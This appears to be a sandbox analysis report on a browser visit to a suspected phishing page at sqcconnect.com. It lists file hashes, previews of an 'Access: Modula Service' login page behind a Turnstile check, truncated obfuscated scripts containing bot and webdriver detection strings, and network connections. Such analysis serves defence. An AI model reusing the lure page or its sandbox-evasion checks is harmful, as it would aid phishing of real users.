                                        SHA-512:2B67675E2058D663D127A752AEB6FE23933A4530F2F064DA5D24D80C9A0786416AD10D2F35714B3BC7BB95791AF09D90A4BDEC480A995A543E25024941EDEC85
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....J.d[.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.u....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.u....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.u...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.u...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........(.v<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (53994), with no line terminators
                                        Category:dropped
                                        Size (bytes):53997
                                        Entropy (8bit):5.238247445583997
                                        Encrypted:false
                                        SSDEEP:1536:C+nWr03AbVY3t3Y3UMJ393U3h3Zrqq0pVnOzm5:C1Rt/nJ5
                                        MD5:04F1F1A75729F5586BF655D0D2BB00CB
                                        SHA1:5AE3E82A4BD74B87BA3C5DA5CB48BF52D1FC504B
                                        SHA-256:27A772998EF163879222D403C6B2AF7661C2538EA211B8F0232D54CF73814A62
                                        SHA-512:16FA7131B6C8793200642CA943F63A7C0FD1AA789683F5C6100E50249A3E2971B33F6ADDEEBC858826D155DBE8A73D1AC170AFEC07F8B95E9209682E56C62052
                                        Malicious:false
                                        Reputation:low
                                        Preview:const a0_0xce11a=a0_0x25f2;(function(_0x3a1515,_0x18fbd4){const _0x63badc=a0_0x25f2,_0x2e46af=_0x3a1515();while(!![]){try{const _0x5e4b53=-parseInt(_0x63badc(0x1c7))/0x1*(-parseInt(_0x63badc(0x119))/0x2)+parseInt(_0x63badc(0x1fb))/0x3+-parseInt(_0x63badc(0x10e))/0x4+parseInt(_0x63badc(0x127))/0x5*(parseInt(_0x63badc(0x18f))/0x6)+parseInt(_0x63badc(0xe4))/0x7*(-parseInt(_0x63badc(0x166))/0x8)+parseInt(_0x63badc(0xeb))/0x9*(-parseInt(_0x63badc(0x1d6))/0xa)+-parseInt(_0x63badc(0x1ad))/0xb*(-parseInt(_0x63badc(0x156))/0xc);if(_0x5e4b53===_0x18fbd4)break;else _0x2e46af['push'](_0x2e46af['shift']());}catch(_0x1eee48){_0x2e46af['push'](_0x2e46af['shift']());}}}(a0_0x1289,0xedc2e));const a0_0x1edacc=a0_0xdd51;function a0_0x25f2(_0x2aefb7,_0xb1a031){const _0x2cbc95=a0_0x1289();return a0_0x25f2=function(_0x3f0740,_0x255079){_0x3f0740=_0x3f0740-0xc8;let _0x31bfbd=_0x2cbc95[_0x3f0740];return _0x31bfbd;},a0_0x25f2(_0x2aefb7,_0xb1a031);}(function(_0x4893da,_0x46b3ce){const _0x28040c=a0_0x25f2,_0xa91
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text
                                        Category:downloaded
                                        Size (bytes):1342
                                        Entropy (8bit):4.739875828455379
                                        Encrypted:false
                                        SSDEEP:24:xY0CVEsHpGvRNMfvw+WoiJfJWkcbxN3bRRdJRRyqdCVoV4T:zG64pQJlcbZJn6T
                                        MD5:972F4F12ECFAE461B427EDD50CF5A4B1
                                        SHA1:B792E81C101C714DABF926C00129CB1C2BA81608
                                        SHA-256:175F7CDFA0F7A126815F61A68F5EEA512A955412CDD68D9B284607A76D607F26
                                        SHA-512:1F6A86DA76610EE3271904EBB8A585799894B02716B4CA594CEAE40B73081376580D1981CB36DF88E898E4CE3F08A048C7480B83E1560949A7B700890F25CBAF
                                        Malicious:false
                                        Reputation:low
                                        URL:https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Preview:..<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Access: Modula Service</title>. <link href="https://api.faviconkit.com/modula.com/144" rel="shortcut icon">. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>. <style>. body {. justify-content: center;. height: 100vh;. font-family: 'Segoe UI', Tahoma, Verdana, sans-serif;. align-items: center;. margin: 0;. display: flex;. } . .tetiary-median {. text-align: center;. }. </style>.</head>.<body>. <div class="tetiary-median">. <form id="standard-class" action="" method="post">. <div class="cf-turnstile" data-sitekey="0x4AAAAAAA0Aa6igGlTE6pvw" data-callback="TurnstileSuccess"></div>. <input type="hidden" id="cf-turnstile-response" name="cf-turnstile-resp
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):142
                                        Entropy (8bit):4.50160997716389
                                        Encrypted:false
                                        SSDEEP:3:YWR4b6aWzHKLJ0dcRHQ+HKzBHJV5ThjERuBSa/dcRHQ+HKzBH1:YWybqGRw+qzxJVRhcuNGRw+qzx1
                                        MD5:EF588460CAEE54D0C474E24E03E2D9E2
                                        SHA1:E58EA24ED094887E84781CF186AD850643B2CDAB
                                        SHA-256:E7ECC9D97E3A587070DFBED35B5F68CB05177D8346028DC901252570BF86D40D
                                        SHA-512:2A547B44D5DD3498C22FAA1E1DEF1F18249730F4399BCA025F51DE3E3EA0605174B4054602E45A01BC315758CC716D2F5F02668969B1804438DCB1168F258A75
                                        Malicious:false
                                        Reputation:low
                                        Preview:{"status":"error","message":"Only POST requests are allowed","debug":{"method":"GET","post_data":[],"error":"Only POST requests are allowed"}}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):73775
                                        Entropy (8bit):5.100143715070242
                                        Encrypted:false
                                        SSDEEP:1536:Vz2O7LKOsyp4UvPOESfaZwk1flt3qETjIZK2J:N25yO2POAuuflt3qETjIZPJ
                                        MD5:717A883E38300147BB98A6002A46D7FB
                                        SHA1:83EEF4D870FD15A5935FCAC6B42FF41C4506FC32
                                        SHA-256:4D1B5E51F9F25C06B72C6799E1DCDC5F2FD49DDC34922EB84FC73B817B65DD61
                                        SHA-512:5AF7A45C918DA727E42D459AAF87287266EE71EC1974B10ABE58AF41B1937CAF4188A6E7F4BF75182A2E091A4693D40B86112B2BD9FD227643C06FE826F93C18
                                        Malicious:false
                                        Reputation:low
                                        Preview:function a0_0x4347() { const _0xc84a2d = ['yncScriptI', 'AAABCAYAAA', 'reasons', 'PVyGZ', 'wGPbe', 'hiEQn', '_evaluate', 'permission', 'eBAFU', 'AfFcSJAAAA', 'calledSele', 'gger', 'OrLqN', 'Error\x20fetc', 'ssions:', 'g_renderer', 'scroll', 'r_unwrappe', 'floor', '$chrome_as', 'cdc_adoQpo', 'WetYV', 'vCWxQ', '3338588rii', '9084138CmaPTx', 'DOMContent', 'Touch\x20even', 'mediaDevic', 'oVZbU', 'use\x20activi', 'le\x20device', 'webdriver', 'alMovement', 'nssRH', 'SqctD', 'llvmpipe', '(((.+)+)+)', 'vent', 'gg==', 'Error\x20send', 'essPattern', '4qMTsuh', 'timeStamp', 'hjBps', 'Opera', 'notificati', 'KwoLz', 'jienD', 'DeRmi', 'nium', '3480XzhGyv', 'checkKeyPr', '1066790gXL', 'voiceData', 'stringify', '1734135gXa', 'FINIX', 'string', 'Chrome', 'ActivityTi', 'ent', 'userAgent', 'includes', 'match', 'ement', '__fxdriver', 'Points', 'name', 'WZSJQ', 'MTpqH', 'availHeigh', 'Akn', 'eOffset', '_info', 'suspicious', 'Context', 'state', 'pbWZi', '4,iVBORw0K', 'getFullYea', 'map', 'GpniM', 'LDPeV', '
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):9305
                                        Entropy (8bit):7.933653267978573
                                        Encrypted:false
                                        SSDEEP:192:AGGLI4x46coQD0hze1ujqLrPZF3u4KWAJ/ugrNfLJqe+L0:vtUVveSq5XhU/ugJDJG0
                                        MD5:9D389F7DA5F16293E67B0E15EAE05EA7
                                        SHA1:93D5995558C544101A1846CA58E69D666BA9C30C
                                        SHA-256:BBF1E254550EA72C0DC96EBB7E989FF57061B8B8DA397079536A830D8E3B6AAA
                                        SHA-512:3B6E46393CF997B93776DFA28020607BA974D0AC2F121348A70DDCDBF6CF19E55FAACB26C3D8AF82E5BC6869D3E79A6A36856C6E983EA581473ED4E7C8CDD428
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR.............=..2..$ IDATx...=nTA...'.(...{D.!JJ*....%... ..8....PRD.n..^.3o.+......5.o*......................................7..i..L......C..m..j_.....K...]...].D.F..{..K.....#\....ty6.[I.7..=]...>Z..............Z.O...t.\...$..H..!\._...u..g....6I.].~].q..+..[u........=Z...l....f.J..n|>........~...0.WB..pWCW)r&.c.?..s.......e...G..A.........}....q...%..UFT[k.o....a....6.e...p...{..5....o...._?&...........q.1>...#...n...............^......27.an..~......!..+9.t.&..v..V+."...B.+RP..D...t.B.*..2..6..P.(".|.ED.G D...D.r.QD.5....Hp...=.{<.vv.U].UB..Vc..Jh...A. ..i_.........$.u.0..{H.....6...^.3p..\A.&...y.c...../[..{....&k...Ob....r.|+....^.sg..!.S83.%.\b.O.....;.....vih.h.L.h..|../..5.$.>...8F{..y|.3..t......2.y.....s.. .......>.@.w....R.....d.o..0..7B\.Cb.....8..._.......<0I..=8.....F}...U..;..r~..>...Wu^a.s.<.tD.t.....i.6U.p....h.o3H."...c..r[_a:.....r..(q@B...[.H.2......$.....O}/...........s?.}.sq....8G{us&....$.).......
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 5, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):4.035372245524405
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlt6/cyhshkxl/k4E08up:6v/lhPnpk7Tp
                                        MD5:EC9572618DD9BA1C080348DF24CC132E
                                        SHA1:6DE001B36F5F9675C90D19411F4D9F0F8BCEF129
                                        SHA-256:FFA873EA57B2B72181017DBD93876D66C5C730793D73C23A56EB8E72087CFAB3
                                        SHA-512:C91F7294F776ADD529C618085D9713D4EA7439FFA3160650FB61ED7563142AA7231452DFD9352706EF88D80F0854DDE4057855CD6E888F94D6C8F0CE3C32986E
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f37b31c6b081a48/1734446759973/CLx1W--8BWsJolI
                                        Preview:.PNG........IHDR....................IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (53994), with no line terminators
                                        Category:downloaded
                                        Size (bytes):53997
                                        Entropy (8bit):5.238247445583997
                                        Encrypted:false
                                        SSDEEP:1536:C+nWr03AbVY3t3Y3UMJ393U3h3Zrqq0pVnOzm5:C1Rt/nJ5
                                        MD5:04F1F1A75729F5586BF655D0D2BB00CB
                                        SHA1:5AE3E82A4BD74B87BA3C5DA5CB48BF52D1FC504B
                                        SHA-256:27A772998EF163879222D403C6B2AF7661C2538EA211B8F0232D54CF73814A62
                                        SHA-512:16FA7131B6C8793200642CA943F63A7C0FD1AA789683F5C6100E50249A3E2971B33F6ADDEEBC858826D155DBE8A73D1AC170AFEC07F8B95E9209682E56C62052
                                        Malicious:false
                                        Reputation:low
                                        URL:https://sqcconnect.com/editor/f.js
                                        Preview:const a0_0xce11a=a0_0x25f2;(function(_0x3a1515,_0x18fbd4){const _0x63badc=a0_0x25f2,_0x2e46af=_0x3a1515();while(!![]){try{const _0x5e4b53=-parseInt(_0x63badc(0x1c7))/0x1*(-parseInt(_0x63badc(0x119))/0x2)+parseInt(_0x63badc(0x1fb))/0x3+-parseInt(_0x63badc(0x10e))/0x4+parseInt(_0x63badc(0x127))/0x5*(parseInt(_0x63badc(0x18f))/0x6)+parseInt(_0x63badc(0xe4))/0x7*(-parseInt(_0x63badc(0x166))/0x8)+parseInt(_0x63badc(0xeb))/0x9*(-parseInt(_0x63badc(0x1d6))/0xa)+-parseInt(_0x63badc(0x1ad))/0xb*(-parseInt(_0x63badc(0x156))/0xc);if(_0x5e4b53===_0x18fbd4)break;else _0x2e46af['push'](_0x2e46af['shift']());}catch(_0x1eee48){_0x2e46af['push'](_0x2e46af['shift']());}}}(a0_0x1289,0xedc2e));const a0_0x1edacc=a0_0xdd51;function a0_0x25f2(_0x2aefb7,_0xb1a031){const _0x2cbc95=a0_0x1289();return a0_0x25f2=function(_0x3f0740,_0x255079){_0x3f0740=_0x3f0740-0xc8;let _0x31bfbd=_0x2cbc95[_0x3f0740];return _0x31bfbd;},a0_0x25f2(_0x2aefb7,_0xb1a031);}(function(_0x4893da,_0x46b3ce){const _0x28040c=a0_0x25f2,_0xa91
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):9305
                                        Entropy (8bit):7.933653267978573
                                        Encrypted:false
                                        SSDEEP:192:AGGLI4x46coQD0hze1ujqLrPZF3u4KWAJ/ugrNfLJqe+L0:vtUVveSq5XhU/ugJDJG0
                                        MD5:9D389F7DA5F16293E67B0E15EAE05EA7
                                        SHA1:93D5995558C544101A1846CA58E69D666BA9C30C
                                        SHA-256:BBF1E254550EA72C0DC96EBB7E989FF57061B8B8DA397079536A830D8E3B6AAA
                                        SHA-512:3B6E46393CF997B93776DFA28020607BA974D0AC2F121348A70DDCDBF6CF19E55FAACB26C3D8AF82E5BC6869D3E79A6A36856C6E983EA581473ED4E7C8CDD428
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR.............=..2..$ IDATx...=nTA...'.(...{D.!JJ*....%... ..8....PRD.n..^.3o.+......5.o*......................................7..i..L......C..m..j_.....K...]...].D.F..{..K.....#\....ty6.[I.7..=]...>Z..............Z.O...t.\...$..H..!\._...u..g....6I.].~].q..+..[u........=Z...l....f.J..n|>........~...0.WB..pWCW)r&.c.?..s.......e...G..A.........}....q...%..UFT[k.o....a....6.e...p...{..5....o...._?&...........q.1>...#...n...............^......27.an..~......!..+9.t.&..v..V+."...B.+RP..D...t.B.*..2..6..P.(".|.ED.G D...D.r.QD.5....Hp...=.{<.vv.U].UB..Vc..Jh...A. ..i_.........$.u.0..{H.....6...^.3p..\A.&...y.c...../[..{....&k...Ob....r.|+....^.sg..!.S83.%.\b.O.....;.....vih.h.L.h..|../..5.$.>...8F{..y|.3..t......2.y.....s.. .......>.@.w....R.....d.o..0..7B\.Cb.....8..._.......<0I..=8.....F}...U..;..r~..>...Wu^a.s.<.tD.t.....i.6U.p....h.o3H."...c..r[_a:.....r..(q@B...[.H.2......$.....O}/...........s?.}.sq....8G{us&....$.).......
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):9305
                                        Entropy (8bit):7.933653267978573
                                        Encrypted:false
                                        SSDEEP:192:AGGLI4x46coQD0hze1ujqLrPZF3u4KWAJ/ugrNfLJqe+L0:vtUVveSq5XhU/ugJDJG0
                                        MD5:9D389F7DA5F16293E67B0E15EAE05EA7
                                        SHA1:93D5995558C544101A1846CA58E69D666BA9C30C
                                        SHA-256:BBF1E254550EA72C0DC96EBB7E989FF57061B8B8DA397079536A830D8E3B6AAA
                                        SHA-512:3B6E46393CF997B93776DFA28020607BA974D0AC2F121348A70DDCDBF6CF19E55FAACB26C3D8AF82E5BC6869D3E79A6A36856C6E983EA581473ED4E7C8CDD428
                                        Malicious:false
                                        Reputation:low
                                        URL:https://api.faviconkit.com/modula.com
                                        Preview:.PNG........IHDR.............=..2..$ IDATx...=nTA...'.(...{D.!JJ*....%... ..8....PRD.n..^.3o.+......5.o*......................................7..i..L......C..m..j_.....K...]...].D.F..{..K.....#\....ty6.[I.7..=]...>Z..............Z.O...t.\...$..H..!\._...u..g....6I.].~].q..+..[u........=Z...l....f.J..n|>........~...0.WB..pWCW)r&.c.?..s.......e...G..A.........}....q...%..UFT[k.o....a....6.e...p...{..5....o...._?&...........q.1>...#...n...............^......27.an..~......!..+9.t.&..v..V+."...B.+RP..D...t.B.*..2..6..P.(".|.ED.G D...D.r.QD.5....Hp...=.{<.vv.U].UB..Vc..Jh...A. ..i_.........$.u.0..{H.....6...^.3p..\A.&...y.c...../[..{....&k...Ob....r.|+....^.sg..!.S83.%.\b.O.....;.....vih.h.L.h..|../..5.$.>...8F{..y|.3..t......2.y.....s.. .......>.@.w....R.....d.o..0..7B\.Cb.....8..._.......<0I..=8.....F}...U..;..r~..>...Wu^a.s.<.tD.t.....i.6U.p....h.o3H."...c..r[_a:.....r..(q@B...[.H.2......$.....O}/...........s?.}.sq....8G{us&....$.).......
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47691)
                                        Category:dropped
                                        Size (bytes):47692
                                        Entropy (8bit):5.4016459163756165
                                        Encrypted:false
                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                        Malicious:false
                                        Reputation:low
                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 5, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):4.035372245524405
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlt6/cyhshkxl/k4E08up:6v/lhPnpk7Tp
                                        MD5:EC9572618DD9BA1C080348DF24CC132E
                                        SHA1:6DE001B36F5F9675C90D19411F4D9F0F8BCEF129
                                        SHA-256:FFA873EA57B2B72181017DBD93876D66C5C730793D73C23A56EB8E72087CFAB3
                                        SHA-512:C91F7294F776ADD529C618085D9713D4EA7439FFA3160650FB61ED7563142AA7231452DFD9352706EF88D80F0854DDE4057855CD6E888F94D6C8F0CE3C32986E
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR....................IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47691)
                                        Category:downloaded
                                        Size (bytes):47692
                                        Entropy (8bit):5.4016459163756165
                                        Encrypted:false
                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):9305
                                        Entropy (8bit):7.933653267978573
                                        Encrypted:false
                                        SSDEEP:192:AGGLI4x46coQD0hze1ujqLrPZF3u4KWAJ/ugrNfLJqe+L0:vtUVveSq5XhU/ugJDJG0
                                        MD5:9D389F7DA5F16293E67B0E15EAE05EA7
                                        SHA1:93D5995558C544101A1846CA58E69D666BA9C30C
                                        SHA-256:BBF1E254550EA72C0DC96EBB7E989FF57061B8B8DA397079536A830D8E3B6AAA
                                        SHA-512:3B6E46393CF997B93776DFA28020607BA974D0AC2F121348A70DDCDBF6CF19E55FAACB26C3D8AF82E5BC6869D3E79A6A36856C6E983EA581473ED4E7C8CDD428
                                        Malicious:false
                                        Reputation:low
                                        URL:https://api.faviconkit.com/modula.com/144
                                        Preview:.PNG........IHDR.............=..2..$ IDATx...=nTA...'.(...{D.!JJ*....%... ..8....PRD.n..^.3o.+......5.o*......................................7..i..L......C..m..j_.....K...]...].D.F..{..K.....#\....ty6.[I.7..=]...>Z..............Z.O...t.\...$..H..!\._...u..g....6I.].~].q..+..[u........=Z...l....f.J..n|>........~...0.WB..pWCW)r&.c.?..s.......e...G..A.........}....q...%..UFT[k.o....a....6.e...p...{..5....o...._?&...........q.1>...#...n...............^......27.an..~......!..+9.t.&..v..V+."...B.+RP..D...t.B.*..2..6..P.(".|.ED.G D...D.r.QD.5....Hp...=.{<.vv.U].UB..Vc..Jh...A. ..i_.........$.u.0..{H.....6...^.3p..\A.&...y.c...../[..{....&k...Ob....r.|+....^.sg..!.S83.%.\b.O.....;.....vih.h.L.h..|../..5.$.>...8F{..y|.3..t......2.y.....s.. .......>.@.w....R.....d.o..0..7B\.Cb.....8..._.......<0I..=8.....F}...U..;..r~..>...Wu^a.s.<.tD.t.....i.6U.p....h.o3H."...c..r[_a:.....r..(q@B...[.H.2......$.....O}/...........s?.}.sq....8G{us&....$.).......
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:downloaded
                                        Size (bytes):73775
                                        Entropy (8bit):5.100143715070242
                                        Encrypted:false
                                        SSDEEP:1536:Vz2O7LKOsyp4UvPOESfaZwk1flt3qETjIZK2J:N25yO2POAuuflt3qETjIZPJ
                                        MD5:717A883E38300147BB98A6002A46D7FB
                                        SHA1:83EEF4D870FD15A5935FCAC6B42FF41C4506FC32
                                        SHA-256:4D1B5E51F9F25C06B72C6799E1DCDC5F2FD49DDC34922EB84FC73B817B65DD61
                                        SHA-512:5AF7A45C918DA727E42D459AAF87287266EE71EC1974B10ABE58AF41B1937CAF4188A6E7F4BF75182A2E091A4693D40B86112B2BD9FD227643C06FE826F93C18
                                        Malicious:false
                                        Reputation:low
                                        URL:https://sqcconnect.com/editor/scripts.js
                                        Preview:function a0_0x4347() { const _0xc84a2d = ['yncScriptI', 'AAABCAYAAA', 'reasons', 'PVyGZ', 'wGPbe', 'hiEQn', '_evaluate', 'permission', 'eBAFU', 'AfFcSJAAAA', 'calledSele', 'gger', 'OrLqN', 'Error\x20fetc', 'ssions:', 'g_renderer', 'scroll', 'r_unwrappe', 'floor', '$chrome_as', 'cdc_adoQpo', 'WetYV', 'vCWxQ', '3338588rii', '9084138CmaPTx', 'DOMContent', 'Touch\x20even', 'mediaDevic', 'oVZbU', 'use\x20activi', 'le\x20device', 'webdriver', 'alMovement', 'nssRH', 'SqctD', 'llvmpipe', '(((.+)+)+)', 'vent', 'gg==', 'Error\x20send', 'essPattern', '4qMTsuh', 'timeStamp', 'hjBps', 'Opera', 'notificati', 'KwoLz', 'jienD', 'DeRmi', 'nium', '3480XzhGyv', 'checkKeyPr', '1066790gXL', 'voiceData', 'stringify', '1734135gXa', 'FINIX', 'string', 'Chrome', 'ActivityTi', 'ent', 'userAgent', 'includes', 'match', 'ement', '__fxdriver', 'Points', 'name', 'WZSJQ', 'MTpqH', 'availHeigh', 'Akn', 'eOffset', '_info', 'suspicious', 'Context', 'state', 'pbWZi', '4,iVBORw0K', 'getFullYea', 'map', 'GpniM', 'LDPeV', '
                                        No static file info
                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 17, 2024 15:45:46.249036074 CET49698443192.168.2.17103.233.24.19
                                        Dec 17, 2024 15:45:46.249089003 CET44349698103.233.24.19192.168.2.17
                                        Dec 17, 2024 15:45:46.249155998 CET49698443192.168.2.17103.233.24.19
                                        Dec 17, 2024 15:45:46.249422073 CET49698443192.168.2.17103.233.24.19
                                        Dec 17, 2024 15:45:46.249443054 CET44349698103.233.24.19192.168.2.17
                                        Dec 17, 2024 15:45:46.249974012 CET49699443192.168.2.17103.233.24.19
                                        Dec 17, 2024 15:45:46.250046015 CET44349699103.233.24.19192.168.2.17
                                        Dec 17, 2024 15:45:46.250118971 CET49699443192.168.2.17103.233.24.19
                                        Dec 17, 2024 15:45:46.250283003 CET49699443192.168.2.17103.233.24.19
                                        Dec 17, 2024 15:45:46.250313997 CET44349699103.233.24.19192.168.2.17
